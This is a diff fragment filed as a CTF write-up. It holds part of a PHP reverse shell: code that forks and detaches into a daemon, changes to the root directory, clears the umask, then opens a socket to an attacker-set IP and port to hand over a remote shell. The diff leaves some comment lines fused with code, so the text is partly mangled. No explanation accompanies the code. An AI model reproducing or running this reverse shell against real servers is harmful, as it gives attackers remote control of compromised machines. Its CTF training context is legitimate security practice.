c2i-junia/ctf-14-10-2024/jour1/write-up.md

 $daemon = 0;
 $debug = 0;

-//
 // Daemonise ourself if possible to avoid zombies later
-//

-// pcntl_fork is hardly ever available, but will allow us to daemonise
-// our php process and avoid zombies.
-Worth a try... if (function_exists('pcntl_fork')) {
+if (function_exists('pcntl_fork')) {
-	// Fork and have the parent process exit
 	$pid = pcntl_fork();
 	if ($pid == -1) {
 		printit("ERROR: Can't fork");
 		exit(1);
 	}
 	if ($pid) {
 		exit(0);  // Parent exits
 	}

-	// Make the current process a session leader
-	// Will only succeed if we forked if (posix_setsid() == -1) {
+	if (posix_setsid() == -1) {
 		printit("Error: Can't setsid()");
 		exit(1);
 	}
 	$daemon = 1;
 } else {
 	printit("WARNING: Failed to daemonise.
 This is quite common and not fatal.");
 }

-// Change to a safe directory
 chdir("/");

-// Remove any umask we inherited umask(0);

-//
-// Do the reverse shell...
-//
+umask(0);

 // Open reverse connection
 $sock = fsockopen($ip, $port, $errno, $errstr, 30);